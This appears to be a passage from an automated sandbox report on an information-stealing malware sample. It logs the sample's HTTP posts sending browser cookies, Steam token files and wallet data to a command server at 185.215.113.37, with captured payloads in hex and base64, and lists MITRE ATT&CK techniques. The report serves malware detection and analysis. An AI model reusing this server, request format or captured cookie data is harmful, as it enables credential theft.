32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4f 44 45 7a 4d 44 41 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 6b 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 7a 41 77 4e 44 6b 35 43 55 35 4a 52 41 6b 31 4d 54 45 39 61 7a 6c 30 56 44 4e 78 4e 31 6c 6d 61 44 46 75 65 46 39 47 55 32 77 77 4e 6b 59 31 56 55 56 66 64 6d 52 68 52 6c 46 79 5a 57 6c 48 53 32 55 78 59 55 52 4f 4f 44 4e 4e 5a 58 5a 6c 52 44 64 51 54 44 46 53 57 6c 68 32 59 54 52 7a 4c 57 35 47 59 7a 6c 33 59 56 46 70 4f 55 78 30 53 32 46 32 64 56 52 4a 59 6d 45 34 54 56 56 72 62 30 64 31 4e 54 68 46 4f 45 55 34 4d 57 64 33 51 6c 39 55 56 30 6f 30 54 6d 63 74 54 47 5a 44 64 6e 70 6f 5a 57 30 33 63 6b 35 79 61 46 70 52 4d 6d 46 48 64 6b 70 61 4f 57 63 79 56 46 6c 6f 63 58 67 79 56 7a 4a 50 4e 45 55 33 64 55 68 52 65 6c 42 72 4d 33 5a 31 54 48 5a 4e 54 48 68 47 57 46 70 7a 63 55 55 32 54 6d 52 42 56 6d 6c 52 52 45 56 44 52 33 42 76 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhR
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file"------CFHCGHJDBFIIDGDHIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 2d 2d 0d 0a Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="file"------GDBKKFHIEGDHJKECAAKK--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="message"wallets------IJKFHDBKFCAAECBFIDHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"ybncbhylepme------HJDBFBKKJDHJKECBGDAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 2d 2d 0d 0a Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file"------AAFIDGCFHIEHJJJJECAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIEHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 2d 2d 0d 0a Data Ascii: ------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="message"files------CFIECFIJDAAKEBGCGHIE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIJEBAECGCBKECAAAEBF--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
